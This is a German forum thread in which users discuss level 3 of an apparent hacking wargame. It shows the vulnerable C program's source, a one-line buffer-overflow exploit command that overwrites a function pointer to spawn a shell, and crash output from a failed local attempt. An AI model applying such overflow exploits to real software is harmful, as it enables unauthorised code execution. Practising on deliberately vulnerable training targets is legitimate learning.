micha Report Share Posted September 21, 2009 Wem noch? Link to comment Share on other sites More sharing options...
Vitschidir Report Share Posted September 21, 2009 *meld* Link to comment Share on other sites More sharing options...
Neongenesis Report Share Posted September 21, 2009 level3@io:~$ cat /levels/level3.c #include #include #include int good(int addr) { printf("Address of hmm: %p\n", addr);} int hmm() { printf("Win.\n"); execl("/bin/sh", "sh", NULL);}extern char **environ;int main(int argc, char **argv) { int i, limit; for(i = 0; environ[i] != NULL; i++) memset(environ[i], 0x00, strlen(environ[i])); int (*fptr)(int) = good; char buf[32]; if(strlen(argv[1]) <= 40) limit = strlen(argv[1]); for(i = 0; i <= limit; i++) { buf[i] = argv[1][i]; if(i < 36) buf[i] = 0x41; } int (*hmmptr)(int) = hmm; (*fptr)((int)hmmptr); return 0; } level3@io:/levels$ ./level3 $(echo -n "123456789012345678901234567890123456"; echo -ne "\x7f\x84\x04\x08") mist rotz Link to comment Share on other sites More sharing options...
Ellaire Report Share Posted September 21, 2009 ihr suckt Link to comment Share on other sites More sharing options...
Radi Report Share Posted September 21, 2009 radi@shaman:~$ ./level3 $(echo -n "123456789012345678901234567890123456"; echo -ne "\x7f\x84\x04\x08")Address of hmm: 0x804851f*** stack smashing detected ***: ./level3 terminated======= Backtrace: =========/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f0e138]/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7f0e0f0]./level3[0x8048668]/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe0)[0xb7e37450]./level3[0x8048480]======= Memory map: ========08048000-08049000 r-xp 00000000 08:01 5800032 /home/radi/level308049000-0804a000 rw-p 00000000 08:01 5800032 /home/radi/level30804a000-0806b000 rw-p 0804a000 00:00 0 [heap]b7e20000-b7e21000 rw-p b7e20000 00:00 0b7e21000-b7f6a000 r-xp 00000000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.sob7f6a000-b7f6b000 r--p 00149000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.sob7f6b000-b7f6d000 rw-p 0014a000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.sob7f6d000-b7f71000 rw-p b7f6d000 00:00 0b7f77000-b7f81000 r-xp 00000000 08:01 5947410 /lib/libgcc_s.so.1b7f81000-b7f82000 rw-p 0000a000 08:01 5947410 /lib/libgcc_s.so.1b7f82000-b7f84000 rw-p b7f82000 00:00 0b7f84000-b7f85000 r-xp b7f84000 00:00 0 [vdso]b7f85000-b7f9f000 r-xp 00000000 08:01 5949259 /lib/ld-2.7.sob7f9f000-b7fa1000 rw-p 00019000 08:01 5949259 /lib/ld-2.7.sobfa85000-bfa9a000 rw-p bffeb000 00:00 0 [stack]Abortedradi@shaman:~$ und jetzt? Link to comment Share on other sites More sharing options...
Neongenesis Report Share Posted September 21, 2009 Radi schrieb:und jetzt? bei dir wäre das /level3 $(echo -n "123456789012345678901234567890123456"; echo -ne "\x1f\x85\x04\x08") Link to comment Share on other sites More sharing options...
Radi Report Share Posted September 21, 2009 radi@shaman:~$ ./level3 $(echo -n "123456789012345678901234567890123456"; echo -ne "\x1f\x85\x04\x08")Address of hmm: 0x804851f*** stack smashing detected ***: ./level3 terminated======= Backtrace: =========/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7ee2138]/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7ee20f0]./level3[0x8048668]/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe0)[0xb7e0b450][0x0]======= Memory map: ========08048000-08049000 r-xp 00000000 08:01 5800032 /home/radi/level308049000-0804a000 rw-p 00000000 08:01 5800032 /home/radi/level30804a000-0806b000 rw-p 0804a000 00:00 0 [heap]b7df4000-b7df5000 rw-p b7df4000 00:00 0b7df5000-b7f3e000 r-xp 00000000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.sob7f3e000-b7f3f000 r--p 00149000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.sob7f3f000-b7f41000 rw-p 0014a000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.sob7f41000-b7f45000 rw-p b7f41000 00:00 0b7f4b000-b7f55000 r-xp 00000000 08:01 5947410 /lib/libgcc_s.so.1b7f55000-b7f56000 rw-p 0000a000 08:01 5947410 /lib/libgcc_s.so.1b7f56000-b7f58000 rw-p b7f56000 00:00 0b7f58000-b7f59000 r-xp b7f58000 00:00 0 [vdso]b7f59000-b7f73000 r-xp 00000000 08:01 5949259 /lib/ld-2.7.sob7f73000-b7f75000 rw-p 00019000 08:01 5949259 /lib/ld-2.7.sobf94b000-bf960000 rw-p bffeb000 00:00 0 [stack]Abortedradi@shaman:~$ Nun bin ich ja viel schlauer! Tolles Programm. Link to comment Share on other sites More sharing options...
Neongenesis Report Share Posted September 21, 2009 schau doch was es macht und was die adresse soll :D geht ja eig. auch nur darum das es sinlos ist wie die sig von herb ^^ das ganze, wozu auch der program code her ist, ist auch nur ein spiel mit, je server 26+ level, dies hier war level3. Geht daraum sich durch lücken im code ein neues level zu erarbeiten... das hier ist noch recht leicht :D Link to comment Share on other sites More sharing options...